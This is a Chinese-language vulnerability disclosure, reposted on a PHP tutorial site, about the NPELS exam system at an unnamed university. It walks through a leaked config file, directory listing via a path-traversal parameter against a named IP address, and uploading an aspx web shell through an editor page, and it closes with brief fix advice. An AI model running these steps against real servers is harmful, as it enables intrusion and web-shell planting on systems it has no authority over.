来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 信息泄露和权限不严导致列目录及上传以某大学的为例:http://www.2cto.com /NPELSNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址setting name=Update_CommonSvr_CommonServ......
|
信息泄露和权限不严导致列目录及上传
以某大学的为例:
http://www.2cto.com /NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
http://www.2cto.com /NPELS/CommonService.asmx/GetTestClientFileList?version=1, 0, 0, 2187
进一步列目录(返回的网页很大,可以直接 wget 下来)
http://xxx/NPELS/CommonService.asmx/GetTestClientFileList?version=../../
发现
http:/xxx/npelsv/editor/editor.htm可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
OOXX
修复方案:
好像考试系统必须使用 CommonService.asmx 最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
